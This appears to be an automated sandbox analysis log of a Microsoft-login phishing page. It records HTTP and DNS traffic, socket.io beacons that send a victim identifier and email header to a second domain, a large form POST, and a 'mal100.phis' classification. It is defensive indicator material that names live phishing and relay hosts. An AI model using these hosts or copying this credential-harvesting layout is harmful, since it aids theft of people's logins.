Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1xe5ulvNlDKvPlK&MD=7mbNbYNh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8El5Y HTTP/1.1Host: drensyoons1sedt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER14109p24U14101457Session_Email: realuser@fake.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://carolyndc.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=9ayRm2PCzdhJEleuABan HTTP/1.1Host: drensyoons1sedt.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://carolyndc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: GoMNte9BqN8+sPHS0Wym4g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8El5Y HTTP/1.1Host: drensyoons1sedt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan HTTP/1.1Host: drensyoons1sedt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8ElUm&sid=9ayRm2PCzdhJEleuABan HTTP/1.1Host: drensyoons1sedt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER14109p24U14101457Session_Email: realuser@fake.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://carolyndc.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1xe5ulvNlDKvPlK&MD=7mbNbYNh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8F1xk HTTP/1.1Host: drensyoons1sedt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER14109p24U14101457Session_Email: no@thankyou.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://carolyndc.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=NSMKkWgqL-vKTiOJABa9 HTTP/1.1Host: drensyoons1sedt.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://carolyndc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 4e6F130rgrsuVinqYEg6uA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8F1xk HTTP/1.1Host: drensyoons1sedt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8F2Sv&sid=NSMKkWgqL-vKTiOJABa9 HTTP/1.1Host: drensyoons1sedt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER14109p24U14101457Session_Email: no@thankyou.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://carolyndc.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8F2Su&sid=NSMKkWgqL-vKTiOJABa9 HTTP/1.1Host: drensyoons1sedt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PC8F2Sv&sid=NSMKkWgqL-vKTiOJABa9 HTTP/1.1Host: drensyoons1sedt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3

Source: global traffic	DNS traffic detected: DNS query: ad.broadstreetads.com
Source: global traffic	DNS traffic detected: DNS query: carolyndc.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: drensyoons1sedt.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Source: unknown

HTTP traffic detected: POST /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1Host: carolyndc.comConnection: keep-aliveContent-Length: 138992Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://carolyndc.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_73.1.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: chromecache_74.1.dr	String found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://google.com
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
Source: chromecache_73.1.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
Source: chromecache_75.1.dr, chromecache_73.1.dr	String found in binary or memory: https://www.w3schools.com/w3css/4/w3.css

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49756 version: TLS 1.2

Source: classification engine

Classification label: mal100.phis.win@18/40@28/14

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

